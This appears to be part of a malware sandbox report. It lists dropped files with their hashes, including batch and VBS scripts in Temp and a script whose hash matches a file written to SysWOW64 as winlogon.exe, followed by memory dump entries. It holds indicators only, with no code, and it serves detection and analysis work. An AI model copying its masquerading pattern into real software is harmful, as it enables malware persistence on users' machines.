cd1ff25b77f870e4f1f84ec6fef7273f195056f557942bc7844619839ae30717

SHA512
8a10699eb73107cd5507e533c00ad03acbfbe3c5f6dd44b65405dd7ca0de8e183065fbf3386754ce4abde49e91ea4675ce714e408c415e2bd85181e1c65e5746

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
f6bfa45bb98845ffdd25ebf67aed5ecb

SHA1
b98f7a94378f0c521033588acf679cb1973b3872

SHA256
a7e91f38a720ce47e536ef1e3e409e353b9d3c07257dbb40cd1d8b903c575b6e

SHA512
8812b6a0ee4c437ba85ea44a758660cc554142bf05ceeebcccb454f84716659e8f52c3ffa52e5123cc2bafc529fe1914c2afca9ad2bbb931c94b7d2bb67698f6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
83f2d649c2b5e07f84a30fa63fd2f7ed

SHA1
beb2f9179e54d7bff51a01cfce9aeb2daf6e394e

SHA256
7906127f8cc55da0776337f20157e9054cf5e85e46dfb9f7b7ae83ff19f6be0c

SHA512
8f0e6aacd17d02e7c06bbd1dc0631fc23e71f07580f7767a5c03b7496578275e1465de111c9c162ea79d806663a5314fe7140766b06a7b2f5eb733837977e4b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
b31f6d27e40b719fb6d98fcfce2cfa13

SHA1
b6c64241bb9f2a1820eaaa34f0439ee9e378866b

SHA256
d1e0c5bb4429de0ef055a4fbdf99a7326c7e7afe76b45ec190e83ba77b693cda

SHA512
36fb8e0ac96b2e2c69a09ea8c4e9a70eac12cf394c1b1f0aadce1d62b947546d790a0c60daeb78561f89fe56783805ecb9fe30ef86cf1dec4b5f0f40119c3b78

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
aa33b52c65c5c21ed425eb140648a7d0

SHA1
bc62ae23687bf46ecd11694548b22a0b8523fe0d

SHA256
a27e6851443d5f97b9ecb7c49f1d15da5cbf064c970dabee82c459ca47ec34b7

SHA512
53102235afb8d13ae2499ec118bd34b645cc6dba9a191885481ada183f348b8baf0698559853cfe7d372aa78eaf210173dd747d51846835f405a2edc437866a9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
d09d817ae0be3866bdf001b3cb289e3e

SHA1
266548928d7c42c74c7ce2e7959890a01aa85917

SHA256
b0ea0713e6299f722627b8c6efdf77bf7ff862f1dc334cd6d778b16c92c48dbb

SHA512
accb0b22d22b659f2e5b0a0c9ecbce665f9118dd5b1a3415345de9bc99a0587aef9d215c9e317b73c7c11803b5e7c9f8009fa6da0fc14603def93b7ca7e9a3c1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
67027998d14b6152aace16dac81c15c2

SHA1
8ebad935afad4d0c647253d52d08b5d13f6895e6

SHA256
4c00fa7aa97a1c138e9e20866cbfa8c5a61fdfd7ca460609114b520ff2f5d291

SHA512
dfa21c7ff0bdb0886250e6330480ccb5967d8ad23c8408765b7a8be11b6859ce43c0d817068f87dab4e32451957877c4c6bd68f4ed4b7b653e45a111afdad370

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
96f6de342faea4a68bdf9781dbc41dd2

SHA1
69f1fe712dbe691129bd9e64e10579e95fe42834

SHA256
45a0b3bc6a98fdc3c7351df6bb82493432cf7aa2995d3ff21f370251269b0ca5

SHA512
8a22e840079ebcaac006e7bc2bba49c76d4c548c279819f669ccfedba6baad79363d9154ee5cafc7c88fa47b0dbe00d4aaa262918324e33595cbfa8462cde448

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
62c221f52904c544e0e1f97985df084f

SHA1
fa559f918713cc5cbe8ecb8736ac7506a9934328

SHA256
9fe56d53f55122df1015dda49fd69308c886dd283019a1edaccf036b7edd215c

SHA512
483ea383a46f76368cfd74842b79d1d5a83669a0ee6a83f1d240b234abc2a7a361e2d4ee456b26ce75cf403665fb2268d3b6449ba419687bdc3e9f58001ffe4c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
cdd6e808725d2cfa9969a638497de61d

SHA1
ba7df8799da2016a14daf8dc9772c6ab049f0971

SHA256
386e1aa955f1e38b96de224a9d7b8426076fcb511e546656e7020d695dab776d

SHA512
1ed385d37157ef8658c3b8b83fd9269af89590f1541c4fe692233e25b93a6ce7a05846d8bef3e890456aa68886c6f84c9a2a395d8cdf08f10cded804ea43d961

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
1e2a9b58005c0211ccce91310b307b10

SHA1
8aeb0f9da2a824bd6123ea01712d7d8de3cab08e

SHA256
7b69f29880961e17f3fca5610317dd96f24328859cf557c02309e9f6174beecb

SHA512
f6458929f59c9dc03d3096c5aba184de4f85ac53489f101a2fc5f94c56282f3392d24daeb2eadcbd548c26556c8ada11958e2eb75e9fe036959d3478708af397

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
1d3ed5b983497bb8f2a39fcfc821f59d

SHA1
cd99c7b2a00c5a23f21d156c19c20c68e6c2233f

SHA256
e616a31101886ea2b93eaa44a38ac0040574bf07ac4dc43e53954e8afd35b217

SHA512
89cf48e45f20f0c3a1b898991e1fa1abf6b9769ab4329076ed5f71d4722b2f4020cc68e0c0f30175f0f86b51ac6c5d87f34d8b22c55cd0e7c40d6721f4c6648b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
2aa58fda61c10a4858b09a184b789798

SHA1
d6fe63568955fbb6999b7fce72b9a0be23779c79

SHA256
be72261ee7962a5fa3ebaa0874a17580f87796258294df45c17eac7359154f97

SHA512
c331164cde466d29570698162a3659919fb5c8f674e696683bd7c37ca6c3c673a5333e73bd18e1b302c48af910ab666a49b4fe69269cffedf76b4f901aadf7e0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
a95e2473138808ecc86263f50aababc8

SHA1
25a276b3a1ce4cc5b5fb9f75569dae2e3ed56842

SHA256
a078fb5a3ed83d0ac23c9feb4ce65736c385c9b57dac68b162221a441469c198

SHA512
d3228fe5ac113ab0ad1b1ffed2cfe3994a1f23ee828f68d2f75f79c7ea87b2e2a8886bbd25874eb9d9b5aff5cfc074419e1245f1250f4559fab59a44bf3d212f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
d64804ffae69d7918228627f0d32017a

SHA1
5c233ba447dd643c8551fd95d41bb91c3dd38a39

SHA256
81b9b566719d747cad9b504a4e1a00ac912b5b88852045ecfe77f82f74354d0f

SHA512
f97c8fc2273af82891be0c4f93f4fea803615533125e1302dfca72c674952581a21c3efd5376178aaeb11da4178c1a3e3f7243c9e52aa2dbb9d731b018ad4860

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
dc52c179dce5d1346908ae0060ba2777

SHA1
0ede552d01d8bcc03ee4de0ded69e909c09701f3

SHA256
3e7c87a798aa603603d648df0ac06b199ef5701d311b00f76ef0bb3415893149

SHA512
83f9cf508df2ce17bb01c6cf1c38b77cf7a6eea3e726a4c1fa518f242f3f43cf32017ee6ce961239f57a705af35994848b034e765a6839fb8478db603e0d927d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
0960962430d90e507f987a06025d9654

SHA1
4a2c746f1f603906c1ad680a7c8661441b237c10

SHA256
0015604c6388ecae8b1672baf8ee6d4e3c3e25effd97d81fbc4656cfefbe2678

SHA512
2b37df144b4894df4257f9287b499765c767af954ffd483e135fc43909923594770f4c42627f2c00eeab17dac45706026c29334cd21dc0b516630f952a2d098d

Download Submit
C:\Users\Admin\AppData\Local\Temp\A07B.tmp\01010.bat

Filesize
513KB

MD5
8d1109c0f75304a7219588c0ffc7e997

SHA1
43efd48afd886e2199022032e40711e70a0f21e7

SHA256
7907db143ca9dc8fae5716ddfe203b2c5aae8809277f0de9a82a469d5a70b4a6

SHA512
ce2cf67157da11594b7eb0435f440832e8ec662612eb80acb5fe50d907d55f4287b32f64a6288f85220cffe4f1de1f28146971b915b99294bc8a42382d2d0012

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyoynl3z.04s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\info.dat

Filesize
16KB

MD5
87d83bed41cafc8680c02203515e3aa4

SHA1
bf9dd4cf7d0807825643f3b59a10d2a92c8ada80

SHA256
f413210786bbaa797498c652b2841b11f3de5823a00b8c5afe54c5721ba6f35b

SHA512
fdbd219c15c5c02484a4d71d2f6128cb0a050d258ad8c9b5f7b68bf9a1cedf04533e31f708dcdfbc287cd0e82e61919dcd0b2c5e369e71cf1bd39396117aefb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\svc.bat

Filesize
372KB

MD5
a701d29c4416d2086e60d86bc5b4b87d

SHA1
c4e4f894d07beedbaf2bc07c4cfe2610542c0308

SHA256
57d8a5d51dac1c562a76747db459dbeeb06a0024d463bd9ebd778ab81c500127

SHA512
1655167a5ebcae99a2054c7b3416cf79aa03474f37be8616d348d2ae38d7bbca84b211f19f1cf79bd322dff5adfebc9e9ca03c0aa73ab219e21735eb33fa82a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\vbs.vbs

Filesize
63B

MD5
81d55093e60838f093954e7a82ddb205

SHA1
ac01ec9f2c29880694ef87ac456d71f0f0fdfc1f

SHA256
39893bb8b88d8e5042e9ad22a4cc9b1573499610b15c5ea12e55e831e6faf61c

SHA512
8efb09f09e100a1288e01087ed759994ea5454b8e33f25ef6fe88422cdda571e0ee851af2ca290a90ddd3c2d6ced71e6cecf8efedb22b743f0ca2fcd53f1c145

Download Submit
C:\Users\Admin\CcEFiCMXAliVh.exe

Filesize
45KB

MD5
d3159ddcf2ed341fb9bcc2615572ad40

SHA1
a80fceb09a1f9ef715aa60c2d3d8cdabb2acc667

SHA256
1af66cf57c736d654c7bcad3ae7c1788729dfe4b95daeedaab3df72bf71c1197

SHA512
648388398b9ff6c779a8e786012279a42ee85e4e8a1a60f499bd32c377012f8d77cd7b798209cf8420979528f90d15075ba2c00dcee8e4ac8a2b7a2cf7445f0e

Download Submit
C:\Users\Admin\CcEFiCMXAliVh.exe

Filesize
45KB

MD5
d3159ddcf2ed341fb9bcc2615572ad40

SHA1
a80fceb09a1f9ef715aa60c2d3d8cdabb2acc667

SHA256
1af66cf57c736d654c7bcad3ae7c1788729dfe4b95daeedaab3df72bf71c1197

SHA512
648388398b9ff6c779a8e786012279a42ee85e4e8a1a60f499bd32c377012f8d77cd7b798209cf8420979528f90d15075ba2c00dcee8e4ac8a2b7a2cf7445f0e

Download Submit
C:\Windows\SysWOW64\winlogon.exe

Filesize
372KB

MD5
a701d29c4416d2086e60d86bc5b4b87d

SHA1
c4e4f894d07beedbaf2bc07c4cfe2610542c0308

SHA256
57d8a5d51dac1c562a76747db459dbeeb06a0024d463bd9ebd778ab81c500127

SHA512
1655167a5ebcae99a2054c7b3416cf79aa03474f37be8616d348d2ae38d7bbca84b211f19f1cf79bd322dff5adfebc9e9ca03c0aa73ab219e21735eb33fa82a4

Download Submit
memory/772-532-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/772-534-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/772-533-0x0000000005120000-0x0000000005130000-memory.dmp

Filesize
64KB

Download
memory/1228-470-0x0000000003010000-0x0000000003020000-memory.dmp

Filesize
64KB

Download
memory/1228-469-0x0000000003010000-0x0000000003020000-memory.dmp

Filesize
64KB

Download
memory/1252-508-0x00000000026F0000-0x0000000002700000-memory.dmp

Filesize
64KB

Download
memory/1252-507-0x00000000026F0000-0x0000000002700000-memory.dmp

Filesize
64KB

Download
memory/1252-509-0x00000000026F0000-0x0000000002700000-memory.dmp

Filesize
64KB

Download
memory/1364-300-0x00000000025D0000-0x00000000025E0000-memory.dmp

Filesize
64KB

Download
memory/1396-250-0x0000000005150000-0x0000000005160000-memory.dmp

Filesize
64KB

Download
memory/1396-249-0x0000000005150000-0x0000000005160000-memory.dmp

Filesize
64KB

Download
memory/1764-495-0x0000000004820000-0x0000000004830000-memory.dmp

Filesize
64KB

Download
memory/1764-494-0x0000000004820000-0x0000000004830000-memory.dmp

Filesize
64KB

Download
memory/2016-177-0x0000000005840000-0x0000000005E68000-memory.dmp

Filesize
6.2MB

Download
memory/2016-176-0x00000000014E0000-0x00000000014F0000-memory.dmp

Filesize
64KB

Download
memory/2016-175-0x00000000014E0000-0x00000000014F0000-memory.dmp

Filesize
64KB

Download
memory/2016-174-0x00000000014A0000-0x00000000014D6000-memory.dmp

Filesize
216KB

Download
memory/2016-190-0x00000000065A0000-0x00000000065BE000-memory.dmp

Filesize
120KB

Download
memory/2016-180-0x0000000005F50000-0x0000000005FB6000-memory.dmp

Filesize
408KB

Download
memory/2016-196-0x00000000014E0000-0x00000000014F0000-memory.dmp

Filesize
64KB

Download
memory/2016-179-0x0000000005EE0000-0x0000000005F46000-memory.dmp

Filesize
408KB

Download
memory/2016-178-0x00000000055E0000-0x0000000005602000-memory.dmp

Filesize
136KB

Download
memory/2100-312-0x0000000005110000-0x0000000005120000-memory.dmp

Filesize
64KB

Download
memory/2100-313-0x0000000005110000-0x0000000005120000-memory.dmp

Filesize
64KB

Download
memory/2152-457-0x0000000004BA0000-0x0000000004BB0000-memory.dmp

Filesize
64KB

Download
memory/2152-456-0x0000000004BA0000-0x0000000004BB0000-memory.dmp

Filesize
64KB

Download
memory/2248-572-0x00000000053E0000-0x00000000053F0000-memory.dmp

Filesize
64KB

Download
memory/2248-574-0x00000000053E0000-0x00000000053F0000-memory.dmp

Filesize
64KB

Download
memory/2384-210-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/2384-211-0x00000000047D0000-0x00000000047E0000-memory.dmp

Filesize
64KB

Download
memory/2384-261-0x0000000000D10000-0x0000000000D20000-memory.dmp

Filesize
64KB

Download
memory/2392-482-0x0000000000C40000-0x0000000000C50000-memory.dmp

Filesize
64KB

Download
memory/2508-265-0x0000000002900000-0x0000000002910000-memory.dmp

Filesize
64KB

Download
memory/2508-276-0x0000000002900000-0x0000000002910000-memory.dmp

Filesize
64KB

Download
memory/2508-264-0x0000000002900000-0x0000000002910000-memory.dmp

Filesize
64KB

Download
memory/2748-382-0x0000000004E90000-0x0000000004EA0000-memory.dmp

Filesize
64KB

Download
memory/2796-236-0x0000000005150000-0x0000000005160000-memory.dmp

Filesize
64KB

Download
memory/2796-237-0x0000000005150000-0x0000000005160000-memory.dmp

Filesize
64KB

Download
memory/3124-431-0x0000000004B50000-0x0000000004B60000-memory.dmp

Filesize
64KB

Download
memory/3124-430-0x0000000004B50000-0x0000000004B60000-memory.dmp

Filesize
64KB

Download
memory/3312-560-0x0000000005330000-0x0000000005340000-memory.dmp

Filesize
64KB

Download
memory/3312-559-0x0000000005330000-0x0000000005340000-memory.dmp

Filesize
64KB

Download
memory/3672-171-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3672-162-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3752-344-0x00000000049F0000-0x0000000004A00000-memory.dmp

Filesize
64KB

Download
memory/3752-343-0x00000000049F0000-0x0000000004A00000-memory.dmp

Filesize
64KB

Download
memory/3784-379-0x0000000004B70000-0x0000000004B80000-memory.dmp

Filesize
64KB

Download
memory/3784-378-0x0000000004B70000-0x0000000004B80000-memory.dmp

Filesize
64KB

Download
memory/3900-223-0x00000000054A0000-0x00000000054B0000-memory.dmp

Filesize
64KB

Download
memory/3900-224-0x00000000054A0000-0x00000000054B0000-memory.dmp

Filesize
64KB

Download
memory/4008-340-0x0000000002300000-0x0000000002310000-memory.dmp

Filesize
64KB

Download
memory/4008-341-0x0000000002300000-0x0000000002310000-memory.dmp

Filesize
64KB

Download
memory/4532-418-0x00000000052C0000-0x00000000052D0000-memory.dmp

Filesize
64KB

Download
memory/4852-546-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

Filesize
64KB

Download
memory/4852-547-0x0000000002DA0000-0x0000000002DB0000-memory.dmp

Filesize
64KB

Download
memory/4884-133-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-1015-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-134-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-1018-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-1017-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-1016-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-135-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-136-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-137-0x00007FFB544D0000-0x00007FFB544E0000-memory.dmp

Filesize
64KB

Download
memory/4884-138-0x00007FFB52470000-0x00007FFB52480000-memory.dmp

Filesize
64KB

Download
memory/4884-139-0x00007FFB52470000-0x00007FFB52480000-memory.dmp

Filesize
64KB

Download
memory/4892-417-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/4892-329-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/4892-326-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/4892-327-0x0000000004BB0000-0x0000000004BC0000-memory.dmp

Filesize
64KB

Download
memory/4964-444-0x0000000004B30000-0x0000000004B40000-memory.dmp

Filesize
64KB

Download
memory/4964-443-0x0000000004B30000-0x0000000004B40000-memory.dmp

Filesize
64KB

Download
memory/4968-405-0x0000000005170000-0x0000000005180000-memory.dmp

Filesize
64KB

Download
memory/4968-404-0x0000000005170000-0x0000000005180000-memory.dmp

Filesize
64KB

Download
memory/5040-288-0x0000000004C60000-0x0000000004C70000-memory.dmp

Filesize
64KB

Download
memory/5040-289-0x0000000004C60000-0x0000000004C70000-memory.dmp

Filesize
64KB

Download